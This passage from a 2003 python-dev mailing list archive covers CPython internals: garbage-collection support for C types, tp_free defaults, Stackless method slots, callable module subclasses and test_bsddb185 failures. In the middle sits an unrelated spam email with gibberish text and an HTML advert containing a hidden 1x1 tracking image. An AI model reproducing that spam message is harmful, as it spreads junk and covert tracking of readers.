Message-ID: <16069.15576.807563.525662@montanaro.dyndns.org>

    Barry> We already have the technology to start Python up blazingly fast.
    Barry> All you have to do <wink> is port XEmacs's unexec code.  

So Barry, how far along are you on this?  We all know you're the XEmacs whiz
of the Python crowd. ;-)

DEFUN-ly, yr's,

Skip


From barry@python.org  Fri May 16 20:40:55 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 15:40:55 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16069.15576.807563.525662@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
 <1053112171.2342.7.camel@barry>
 <16069.15576.807563.525662@montanaro.dyndns.org>
Message-ID: <1053114055.2342.10.camel@barry>

On Fri, 2003-05-16 at 15:32, Skip Montanaro wrote:
>     Barry> We already have the technology to start Python up blazingly fast.
>     Barry> All you have to do <wink> is port XEmacs's unexec code.  
> 
> So Barry, how far along are you on this?  We all know you're the XEmacs whiz
> of the Python crowd. ;-)

Well, it's actually working pretty well and I'm about to cvs com....

...oh!  The cat's just eaten it.  Sorry.

bad-kitty-ly y'rs,
-Barry




From jeremy@zope.com  Fri May 16 20:42:40 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 15:42:40 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC53D09.3050505@zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com>
 <1053106533.453.78.camel@slothrop.zope.com>  <3EC53D09.3050505@zope.com>
Message-ID: <1053114159.457.117.camel@slothrop.zope.com>

I'm willing to believe there is a new and better way, but I don't think
I know what it is.  How do we change this code, written using the old
PyObject_GC_New() to do things the new way?

Jeremy

PyObject *
PyDict_New(void)
{
	register dictobject *mp;
	if (dummy == NULL) { /* Auto-initialize dummy */
		dummy = PyString_FromString("<dummy key>");
		if (dummy == NULL)
			return NULL;
#ifdef SHOW_CONVERSION_COUNTS
		Py_AtExit(show_counts);
#endif
	}
	mp = PyObject_GC_New(dictobject, &PyDict_Type);
	if (mp == NULL)
		return NULL;
	EMPTY_TO_MINSIZE(mp);
	mp->ma_lookup = lookdict_string;
#ifdef SHOW_CONVERSION_COUNTS
	++created;
#endif
	_PyObject_GC_TRACK(mp);
	return (PyObject *)mp;
}




From jim@zope.com  Fri May 16 21:22:53 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 16:22:53 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
References: <3EC507CB.6080502@zope.com> <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
Message-ID: <3EC5489D.9070208@zope.com>

Tim Peters wrote:
> [Jim Fulton]
> 
>>...
>>I'll also note that most new-style types don't need and thus don't
>>implement custom allocators. They leave the tp_alloc and tp_free slots
>>empty.
> 
> 
> I'm worried about half of that:  tp_free is needed to release memory no
> matter whether obtained in a standard or custom way.  I don't think tp_free
> slots always get filled in to something non-NULL by magic, and in the
> current Python source almost all new-style C types explicitly define a
> tp_free function (the exceptions are "strange" in some way).
> 
> PEP 253 may be partly out of date here -- or not.  In the section on
> creating a subclassable type, it says:
> 
> """
>    The base type must do the following:
> 
>       - Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.
> 
>       - Declare and use tp_new(), tp_alloc() and optional tp_init()
>         slots.
> 
>       - Declare and use tp_dealloc() and tp_free().
> 
>       - Export its object structure declaration.
> 
>       - Export a subtyping-aware type-checking macro.
> """
> 
> This doesn't leave a choice about defining tp_alloc() or tp_free() -- it
> says both are required.  For a subclassable type, I believe both must
> actually be implemented too.
> 
> For a non-subclassable type, I expect they're optional.  But if you don't
> define tp_free in that case, then I believe you must also not do the
> 
>     obj->ob_type->tp_free(obj)
> 
> business in the tp_dealloc slot (else it will segfault).

Hm, I didn't read the PEP, I just went by what Guido told me. :)

I was told that PyType_Ready fills in tp_alloc and tp_free with default values.

I updated the noddy example in the docs. In this example, I filled
in neither tp_alloc or tp_free.  I tested the examples and verified that
they work.

I just added printf calls to verify that these slots are indeen null before the
call to PyType_Ready and non-null afterwards.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From jim@zope.com  Fri May 16 21:30:47 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 16:30:47 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <1053114159.457.117.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>	 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com>	 <1053106533.453.78.camel@slothrop.zope.com>  <3EC53D09.3050505@zope.com> <1053114159.457.117.camel@slothrop.zope.com>
Message-ID: <3EC54A77.7090106@zope.com>

Jeremy Hylton wrote:
> I'm willing to believe there is a new and better way, but I don't think
> I know what it is. 

You can read the documentation for it here:

http://www.python.org/dev/doc/devel/ext/defining-new-types.html

:)

 > How do we change this code, written using the old
> PyObject_GC_New() to do things the new way?
> 
> Jeremy
> 
> PyObject *
> PyDict_New(void)
> {
> 	register dictobject *mp;
> 	if (dummy == NULL) { /* Auto-initialize dummy */
> 		dummy = PyString_FromString("<dummy key>");
> 		if (dummy == NULL)
> 			return NULL;
> #ifdef SHOW_CONVERSION_COUNTS
> 		Py_AtExit(show_counts);
> #endif
> 	}
> 	mp = PyObject_GC_New(dictobject, &PyDict_Type);
> 	if (mp == NULL)
> 		return NULL;
> 	EMPTY_TO_MINSIZE(mp);
> 	mp->ma_lookup = lookdict_string;
> #ifdef SHOW_CONVERSION_COUNTS
> 	++created;
> #endif
> 	_PyObject_GC_TRACK(mp);
> 	return (PyObject *)mp;
> }

see dict_new in the same file.

The new way to create instances if types is to call the types.

I don't know wht PyDict_New doesn't just call the dict type.
Maybe doing things in-line like this is just an optimization.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From jim@zope.com  Fri May 16 22:08:27 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 17:08:27 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC507CB.6080502@zope.com>
References: <3EC507CB.6080502@zope.com>
Message-ID: <3EC5534B.5000102@zope.com>

Jim Fulton wrote:
> Lately I've been re-learning how to write new types in C.  Things
> changed drastically (for the better) in 2.2. I've been updating the
> documentation on writing new types as I go:
> 
> http://www.python.org/dev/doc/devel/ext/defining-new-types.html
> 
> (I'm also updating modulator.)
> 
> I'm starting to try to figure out how to integrate support for GC.
> The current documentation in the section "Supporting the Cycle
> Collector" doesn't reflect new-style types and is, thus, out of date.
> 
> Frankly, I'm taking the approach that there is only One Way to create
> types in C, the new way, based on new-style types as now documented
> in the manual.
> 
> I'll also note that most new-style types don't need and thus don't
> implement custom allocators. They leave the tp_alloc and tp_free slots
> empty.
> 
> So given that we have a new style type, to add support for GC, we need
> to:
> 
> - Set the Py_TPFLAGS_HAVE_GC type flag,
> 
> - Provide implementations of tp_traverse and tp_clear, as described in
>   the section "Supporting the Cycle Collector" section of the docs.
> 
> - Call PyObject_GC_UnTrack at the beginning of the deallocator,
>   before decrefing any members.
> 
> I think that that is *all* we have to do.

It looks like the answer is "no". :)

I tried to write a type using this formula and segfaulted.
Looking at other types, I found that if I want to support GC and
am using the default allocator, which I get for free, I have to fill
the tp_free slot with PyObject_GC_Del (_PyObject_GC_Del if I want to
support Python 2.2 and 2.3).

I *think* this is all I have to do.

Jim


-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org




From tim@zope.com  Fri May 16 22:37:07 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 17:37:07 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC5489D.9070208@zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEKFFLAA.tim@zope.com>

[Jim Fulton]
> Hm, I didn't read the PEP, I just went by what Guido told me. :)

That's a good idea -- I think the PEP is out of date here.

> I was told that PyType_Ready fills in tp_alloc and tp_free with
> default values.

And I finally found the code that does that <wink>.

> I updated the noddy example in the docs. In this example, I filled
> in neither tp_alloc or tp_free.  I tested the examples and verified that
> they work.
>
> I just added printf calls to verify that these slots are indeen
> null before the call to PyType_Ready and non-null afterwards.

This is the scoop:  if your type does *not* define the tp_base or tp_bases
slot, then PyType_Ready() sets your type's tp_base slot to
&PyBaseObject_Type by magic (this is the C spelling of the type named
"object" in Python), and the tp_bases slot to (object,) by magic.

A whole pile of type slots are then inherited from whatever tp_bases points
to after that (which is the singleton PyBaseObject_Type if you didn't set
tp_base or tp_bases yourself).

The tp_alloc slot it inherits from object is PyType_GenericAlloc.

The tp_free slot  " " " " is PyObject_Del.

This works, but as we both discovered later, it leads to a segfault if your
type participates in cyclic gc too:  your type *still* inherits a tp_free of
PyObject_Del from object then, but that's the wrong deallocation function
for gc'able objects.  However, the default tp_alloc is aware of gc, and does
the right thing either way.

Guido, would you be agreeable to making this magic even more magical?  It
seems to me that we can know whether the current type intends to participate
in cyclic gc, and give it a correct default tp_free value instead if so.
The hairier type_new() function already has this extra level of
Py_TPFLAGS_HAVE_GC-dependent magic for dynamically created types, setting
tp_free to PyObject_Del in one case and to PyObject_GC_Del in the other.
PyType_Ready() can supply a wrong deallocation function by default
("explicit is better than implicit" has no force when talking about
PyType_Ready() <wink>).



From tim@zope.com  Fri May 16 22:43:51 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 17:43:51 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <3EC54A77.7090106@zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEKGFLAA.tim@zope.com>

[Jim Fulton]
> ...
> I don't know wht PyDict_New doesn't just call the dict type.
> Maybe doing things in-line like this is just an optimization.

All aspects of dict objects are indeed micro-optimized.  In the office,
Jeremy raised some darned good points about things in dictobject.c that
don't make good sense anymore, but I'll skip those here because they don't
relate to the topic at hand (in brief, "module initialization" for
dictobject.c is still hiding inside PyDict_New, but there's no guarantee
that *ever* gets called anymore).



From troy@gci.net  Fri May 16 22:45:25 2003
From: troy@gci.net (Troy Melhase)
Date: Fri, 16 May 2003 13:45:25 -0800
Subject: [Python-Dev] a strange case
In-Reply-To: <20030516202402.30333.72761.Mailman@mail.python.org>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
Message-ID: <200305161345.25415.troy@gci.net>

>     Jeremy> I think we decided this wasn't a pure bugfix :-).  Some poor
>     Jeremy> soul may have code that relies on being able to subclass a
>     Jeremy> module.
>
> How about at least deprecating that feature in 2.2.3 and warning about it
> so that poor soul knows this won't be supported forever?

I think I'm knocking on the poor-house door.

Just last night, it occurred to me that modules could be made callable via 
subclassing.  "Why in the world would you want callable modules you ask?"  I 
don't have a real need, but I often see the line blurred between package, 
module, and class.  Witness:

	from Foo import Bar
        frob = Bar()

If Bar is initially a class, then is reimplemented as a module, client code 
must change to account for that.  If Bar is reimplemented as a callable 
module, clients remain unaffected.

I haven't any code that relies on subclassing the module type, but many times 
I've gone thru the cycle of coding a class then promoting it to a module as 
it becomes more complex.  I'm certainly not advocating that the module type 
be subclassable or not, but I did want to point out a possible legitmate need 
to derive from it.  Many apologies if I'm wasting space and time.

-troy 

Silly example:

troy@marchhare tmp $ cat foo.py
def op():
    print 'foo op'

def frob():
    print 'foo frob'

def __call__(a, b, c):
    print 'module foo called!', a, b, c

troy@marchhare tmp $ cat bar.py
class ModuleObject(type(__builtins__)):
    def __init__(self, amodule):
        self.amodule = amodule
        self.__name__ = amodule.__name__
        self.__file__ = amodule.__file__

    def __getattr__(self, attr):
        return getattr(self.amodule, attr)

    def __call__(self, *a, **b):
        return self.amodule.__call__(*a, **b)


import foo
foo = ModuleObject(foo)
foo(1,2,3)

troy@marchhare tmp $ python2.3 bar.py
module foo called! 1 2 3







From drifty@alum.berkeley.edu  Fri May 16 23:13:34 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Fri, 16 May 2003 15:13:34 -0700
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJEFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHIEJEFLAA.tim@zope.com>
Message-ID: <3EC5628E.5060302@ocf.berkeley.edu>

Tim Peters wrote:
>>...
>>The docs for fdopen say nothing about this restriction.  Anyone mind if
>>I add to the docs a mention of this limitation?
> 
> 
> AFAICT, you only asked me, so I'll answer <wink>:

Joys of missing the "reply all" button.  I am cc'ing python-dev on this now.

>  I think this is better
> spelled out in the docs for socket.fileno().  What it says now:
> 
>     Return the socket's file descriptor (a small integer).  This is
>     useful with select.select().
> 
> is correct for Unix, but on Windows it does not return a file descriptor (it
> returns a Windows socket handle, which is also "a small integer", and is
> also useful select.select() -- although on both Windows and Unix,
> select.select() extracts the fileno() from socket objects automatically, so
> there's no *need* to invoke fileno() explicitly in order to call select()).
> 

OK.  I will fix those docs.

-Brett



From drifty@alum.berkeley.edu  Sat May 17 00:25:02 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Fri, 16 May 2003 16:25:02 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
Message-ID: <3EC5734E.30209@ocf.berkeley.edu>

======================================================================
FAIL: test_anydbm_create (__main__.Bsddb185Tests)
----------------------------------------------------------------------
Traceback (most recent call last):
   File "test_bsddb185.py", line 35, in test_anydbm_create
     self.assertNotEqual(ftype, "bsddb185")
   File "/Users/drifty/cvs_code/lib/python2.3/unittest.py", line 300, in 
failIfEqual
     raise self.failureException, \
AssertionError: 'bsddb185' == 'bsddb185'


DBs are not my area of expertise so I don't know how to go about to 
attempt to fix this.

-Brett



From ru4kcp0y@yahoo.com  Sat May 17 04:31:53 2003
From: ru4kcp0y@yahoo.com (Louise Hamilton)
Date: Sat, 17 May 03 03:31:53 GMT
Subject: [Python-Dev] grlsp ihort pjjkku tz w
Message-ID: <8-i12h3fklc$fw-7a-lm582$0-jd@v77.2.yu7>

This is a multi-part message in MIME format.

--D8F835B38D6BFE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
</head>
<body bgcolor=3D"#ffffff">
<table width=3D"600" border=3D"1" align=3D"center" cellpadding=3D"0" cells=
pacing=3D"0" bordercolor=3D"#CCCCCC">
  <tr>
    <td><a href=3D"http://www.freakydays.com/BuySellGuide/index.htm"><img =
src=3D"http://www.freakydays.com/BuySellGuide/images2/buy_sell.gif"
width=3D=
"600" height=3D"450" border=3D"0"></a></td>
  </tr>
</table>

<div align=3D"center">
 
  <img src=3D"http://www.freakydays.com/outy.gif" width=3D"475" height=3D"=
56" border=3D"0" usemap=3D"#Map"> 
  <map name=3D"Map"><area shape=3D"rect" coords=3D"95,30,204,43" href=3D"h=
ttp://www.freakydays.com/nope.html">
    <area shape=3D"rect" coords=3D"387,20,450,35" href=3D"http://www.freak=
ydays.com/nope.html">
  </map>
</div>
<p>&nbsp;</p>
<img src=3D"http://ww2.freakydays.com/where.cfm?id=3Dbuysell" width=3D1" h=
eight=3D"1" border=3D"0">
 </body>
</html>

tjwqyjgof i v
xosasfq cb
keirdl g k yvxu mew olr  wm

qwro
ccdd 
ny bt

--D8F835B38D6BFE--



From tismer@tismer.com  Sat May 17 00:52:20 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 17 May 2003 01:52:20 +0200
Subject: [Python-Dev] Need advice, maybe support
Message-ID: <3EC579B4.9000303@tismer.com>

Hi Guido, all,

In the last months, I made very much progress with Stackless 3.0 .
Finally, I was able to make much more of Python stackless
(which means, does not use recursive interpreter calls) than
I could achive with 1.0 .

There is one drawback with this, and I need advice:
Compared to older Python versions, Py 2.2.2 and up uses
more indirection through C function pointers than ever.
This blocked my implementation of stackless versions, in
the first place.

Then the idea hit me like a blizzard:
Most problems simply vanish if I add another slot to the
PyMethodDef structure, which is NULL by default:
ml_meth_nr is a function pointer with the same semantics
as ml_meth, but it tries to perform its action without
doing a recursive call. It tries instead to push a frame
and to return Py_UnwindToken.
Doing this change made Stackless crystal clear and simple:
A C extension not aware of Stackless does what it does
all the time: call ml_meth.
Stackless aware C code (like my modified ceval.c code)
calls the ml_meth_nr slots, instead, which either defaults
to the ml_meth code, or has a special version which avoids
recursive interpreter calls.
I also added a tp_call_nr slot to typeobject, for similar
reasons.

While this is just great for me, yielding complete
source code compatability, it is a slight drawback, since
almost all extension modules make use of the PyMethodDef
structure. Therefore, binary compatability of Stackless
has degraded, dramatically.

I'm now in some kind of dilemma:
On the one side, I'm happy with this solution (while I have
to admit that it is not too inexpensive, but well, all the
new descriptor objects are also not cheap, but just great),
on the other hand, simply replacing python22.dll is no longer
sufficient. You need to re-compile everything, which might
be a hard thing on Windows (win32 extensions, wxPython).
Sure, I would stand this, if there is no alternative, I would
have to supply a complete replacement package of everything.

Do you (does anybody) have an alternative suggestion how
to efficiently maintain a "normal" and a "non-recursive"
version of a method without changing the PyMethodDef struc?

Alternatively, would it be reasonable to ask the Python core
developers, if they would accept to augment PyMethodDef and
PyTypeObject with an extra field (default NULL, no maintenance),
just for me and Stackless?

Many thanks for any reply - sincerely -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/





From pje@telecommunity.com  Sat May 17 00:48:21 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Fri, 16 May 2003 19:48:21 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <200305161345.25415.troy@gci.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <20030516202402.30333.72761.Mailman@mail.python.org>
Message-ID: <5.1.1.6.0.20030516194238.02fb2d90@telecommunity.com>

At 01:45 PM 5/16/03 -0800, Troy Melhase wrote:
> >     Jeremy> I think we decided this wasn't a pure bugfix :-).  Some poor
> >     Jeremy> soul may have code that relies on being able to subclass a
> >     Jeremy> module.
> >
> > How about at least deprecating that feature in 2.2.3 and warning about it
> > so that poor soul knows this won't be supported forever?
>
>I think I'm knocking on the poor-house door.
>
>Just last night, it occurred to me that modules could be made callable via
>subclassing.

This isn't about subclassing the module *type*, but about subclassing 
*modules*.  Subclassing a module doesn't do anything useful.  Subclassing 
the module *type* does, as you demonstrate.

Python 2.3 still allows you to subclass the module type, even though it 
does not allow you to subclass modules.

Now, if you *really* want to subclass a *module*, then you should check out 
PEAK's "module inheritance" technique that lets you define new modules in 
terms of other modules.  It's useful for certain types of AOP/SOP 
techniques.  But it's currently implemented using bytecode hacking, and is 
therefore evil.  ;)  Anyway, it doesn't rely on actually *subclassing* modules.

Speaking of bytecode hacking, it would be so much easier to implement 
"portable magic" if there were a fast, easy to use, language-defined 
intermediate representation for Python code that one could hack with.  And 
don't tell me to "use Lisp", either...  ;)



From skip@pobox.com  Sat May 17 03:52:41 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 21:52:41 -0500
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC5734E.30209@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu>
Message-ID: <16069.41977.390568.226852@montanaro.dyndns.org>

    Brett> AssertionError: 'bsddb185' == 'bsddb185'

    Brett> DBs are not my area of expertise so I don't know how to go about
    Brett> to attempt to fix this.

I'll look into it.

Skip


From skip@pobox.com  Sat May 17 14:13:05 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 17 May 2003 08:13:05 -0500
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC5734E.30209@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu>
Message-ID: <16070.13665.129282.617413@montanaro.dyndns.org>

Brett,

I goofed a bit in my (private) note to you yesterday.  anydbm._name isn't of
interest.  It's anydbm._defaultmod.  On my system, if I mv Lib/bsddb to
Lib/bsddb- I no longer have the bsddb package available (as you said you
didn't).  In that situation, for me, anydbm._defaultmod is the gdbm module.
All three tests succeed:

    % ./python.exe ../Lib/test/test_bsddb185.py
    test_anydbm_create (__main__.Bsddb185Tests) ... ok
    test_open_existing_hash (__main__.Bsddb185Tests) ... ok
    test_whichdb (__main__.Bsddb185Tests) ... ok

If I delete gdbm.so I get dbm as anydbm._defaultmod.  Again, success:

    % ./python.exe ../Lib/test/test_bsddb185.py
    test_anydbm_create (__main__.Bsddb185Tests) ... ok
    test_open_existing_hash (__main__.Bsddb185Tests) ... ok
    test_whichdb (__main__.Bsddb185Tests) ... ok

Delete dbm.so.  Run again.  Now dumbdbm is anydbm._defaultmod.  Run again.
Success again:

    % ./python.exe ../Lib/test/test_bsddb185.py
    test_anydbm_create (__main__.Bsddb185Tests) ... ok
    test_open_existing_hash (__main__.Bsddb185Tests) ... ok
    test_whichdb (__main__.Bsddb185Tests) ... ok

In short, I can't reproduce your error.  Can you do some more debugging to
see why your anydbm.open seems to be calling bsddb185.open?

Thx,

Skip


From jepler@unpythonic.net  Sat May 17 16:21:39 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 17 May 2003 10:21:39 -0500
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030516142451.GI6196@localhost>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost>
Message-ID: <20030517152137.GA25579@unpythonic.net>

I think that looking at the generated bytecode is useful.

# Running with 'python -O'
>>> def f(x): x += 1
>>> dis.dis(f)
          0 LOAD_FAST                0 (x)
          3 LOAD_CONST               1 (1)
          6 INPLACE_ADD         
          7 STORE_FAST               0 (x)    ***
         10 LOAD_CONST               0 (None)
         13 RETURN_VALUE        
>>> def g(x): x[0] += 1
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (x)
          3 LOAD_CONST               1 (0)
          6 DUP_TOPX                 2
          9 BINARY_SUBSCR       
         10 LOAD_CONST               2 (1)
         13 INPLACE_ADD         
         14 ROT_THREE           
         15 STORE_SUBSCR                      ***
         16 LOAD_CONST               0 (None)
         19 RETURN_VALUE        
>>> def h(x): x.a += 1
>>> dis.dis(h)
          0 LOAD_GLOBAL              0 (x)
          3 DUP_TOP             
          4 LOAD_ATTR                1 (a)
          7 LOAD_CONST               1 (1)
         10 INPLACE_ADD         
         11 ROT_TWO             
         12 STORE_ATTR               1 (a)    ***
         15 LOAD_CONST               0 (None)
         18 RETURN_VALUE        

In each case, there's a STORE step to the inplace statement.  In the case of the proposed
	def j(x): x() += 1
what STORE instruction would you use?

>>> [opname for opname in dis.opname if opname.startswith("STORE")]
['STORE_SLICE+0', 'STORE_SLICE+1', 'STORE_SLICE+2', 'STORE_SLICE+3',
 'STORE_SUBSCR', 'STORE_NAME', 'STORE_ATTR', 'STORE_GLOBAL', 'STORE_FAST',
 'STORE_DEREF']

If you don't want one from the list, then you're looking at substantial
changes to Python.. (and STORE_DEREF probably doesn't do anything that's
relevant to this situation, though the name sure sounds promising,
doesn't it)

Jeff


From tjreedy@udel.edu  Sat May 17 18:34:05 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Sat, 17 May 2003 13:34:05 -0400
Subject: [Python-Dev] Re: [PEP] += on return of function call result
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost>
Message-ID: <ba5rn5$qfn$1@main.gmane.org>

"Luke Kenneth Casson Leighton" <lkcl@samba-tng.org> wrote in message >
1) what is the technical, syntactical or language-specific reason why
>     I can't write an expression like  f(x) += y ?

In general, ignoring repetition of side-effects, this translates to
f(x) = f(x) + y.
Abstractly, the assignment pattern is target(s) = object(s), whereas
above is object = object.  As some of have tried to point out to the
cbv (call-by-value) proponents on a clp thread, targets are not
objects. so object = object is not proper Python.  The reason inplace
op syntax is possible is that syntax that defines a target on the left
instead denotes an object when on the right (of '='), so that syntax
to the left of op= does double duty.  As Jeff Eppler pointed out in
his response, the compiler uses that syntax to determine the type of
target and thence the appropriate store instruction.  But function
call syntax only denotes an object and does not define a target and
hence cannot do double duty.

The exception to all this is listob += seq, which translates to
listob.extend(seq).  So if f returns a list, f(x) += y could be
executed, but only with runtime selection of the apropriate byte code.
However, if you know that f is going to return a list, so that f(x)+=y
seem sensible, you can directly write f(x).extend(y) directly (or
f(x).append(y) if that is what you actually want).  However, since
this does not bind the result to anything, even this is pointless
unless all f does is to select from lists that you can already access
otherwise.  (Example: f(lista,listb,bool_exp).extend(y).)

Terry J. Reedy





From drifty@alum.berkeley.edu  Sat May 17 19:13:15 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 17 May 2003 11:13:15 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <16070.13665.129282.617413@montanaro.dyndns.org>
References: <3EC5734E.30209@ocf.berkeley.edu> <16070.13665.129282.617413@montanaro.dyndns.org>
Message-ID: <3EC67BBB.4090003@ocf.berkeley.edu>

Skip Montanaro wrote:
> Brett,
> 
> I goofed a bit in my (private) note to you yesterday.  anydbm._name isn't of
> interest.  It's anydbm._defaultmod.  

 >>> anydbm._defaultmod
<module 'dbm' from 
'/Users/drifty/cvs_code/lib/python2.3/lib-dynload/dbm.so'>

> On my system, if I mv Lib/bsddb to
> Lib/bsddb- I no longer have the bsddb package available (as you said you
> didn't).  In that situation, for me, anydbm._defaultmod is the gdbm module.
> All three tests succeed:
> 
>     % ./python.exe ../Lib/test/test_bsddb185.py
>     test_anydbm_create (__main__.Bsddb185Tests) ... ok
>     test_open_existing_hash (__main__.Bsddb185Tests) ... ok
>     test_whichdb (__main__.Bsddb185Tests) ... ok
> 
> If I delete gdbm.so I get dbm as anydbm._defaultmod.  Again, success:
> 
>     % ./python.exe ../Lib/test/test_bsddb185.py
>     test_anydbm_create (__main__.Bsddb185Tests) ... ok
>     test_open_existing_hash (__main__.Bsddb185Tests) ... ok
>     test_whichdb (__main__.Bsddb185Tests) ... ok
> 
> Delete dbm.so.  Run again.  Now dumbdbm is anydbm._defaultmod.  Run again.
> Success again:
> 

No success for me when it is using dumbdbm:

======================================================================
ERROR: test_anydbm_create (__main__.Bsddb185Tests)
----------------------------------------------------------------------
Traceback (most recent call last):
   File "Lib/test/test_bsddb185.py", line 39, in test_anydbm_create
     os.rmdir(tmpdir)
OSError: [Errno 66] Directory not empty: '/tmp/tmpkiVKcZ'

----------------------------------------------------------------------

Looks like foo.dat and foo.dir are left (files used by the DB?).  I will 
fix the test again to be more agressive about deleting files.

... done.  Just used shutil.rmtree instead of the nested 'try' 
statements that called os.unlink and os.rmdir .  Now the tests pass for 
dumbdbm.  So it seems to be dbm.so for some reason.

I will see what I can figure out or at least get as much info as I can 
that I think can help in debugging this.

-Brett



From drifty@alum.berkeley.edu  Sat May 17 19:22:00 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 17 May 2003 11:22:00 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC67BBB.4090003@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu> <16070.13665.129282.617413@montanaro.dyndns.org> <3EC67BBB.4090003@ocf.berkeley.edu>
Message-ID: <3EC67DC8.4050809@ocf.berkeley.edu>

Brett C. wrote:

> No success for me when it is using dumbdbm:
> 
> ======================================================================
> ERROR: test_anydbm_create (__main__.Bsddb185Tests)
> ----------------------------------------------------------------------
> Traceback (most recent call last):
>   File "Lib/test/test_bsddb185.py", line 39, in test_anydbm_create
>     os.rmdir(tmpdir)
> OSError: [Errno 66] Directory not empty: '/tmp/tmpkiVKcZ'
> 
> ----------------------------------------------------------------------
> 
> Looks like foo.dat and foo.dir are left (files used by the DB?).  I will 
> fix the test again to be more agressive about deleting files.
> 
> ... done.  Just used shutil.rmtree instead of the nested 'try' 
> statements that called os.unlink and os.rmdir .  Now the tests pass for 
> dumbdbm.  So it seems to be dbm.so for some reason.
> 

But then Skip checked in the exact change I was going to I think almost 
simultaneously.  And guess what?  Now the darned tests pass using dbm! 
I am going to do a completely clean compile and test again to make sure 
this is not a fluke since the only change was ``cvs update`` for 
test_bsddb185.py and that only changed how files were deleted.

Ah, the joys of coding.

-Brett



From drifty@alum.berkeley.edu  Sat May 17 20:18:23 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 17 May 2003 12:18:23 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC67DC8.4050809@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu> <16070.13665.129282.617413@montanaro.dyndns.org> <3EC67BBB.4090003@ocf.berkeley.edu> <3EC67DC8.4050809@ocf.berkeley.edu>
Message-ID: <3EC68AFF.3020900@ocf.berkeley.edu>

Brett C. wrote:
> 
> But then Skip checked in the exact change I was going to I think almost 
